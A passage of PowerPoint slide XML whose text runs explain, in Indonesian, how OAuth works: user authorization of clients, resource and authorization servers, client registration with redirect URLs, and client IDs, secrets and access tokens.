            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OAuth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Klien </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghosting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OAuth (situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyetujui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengabulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. OAuth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aliran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aliran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>divalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
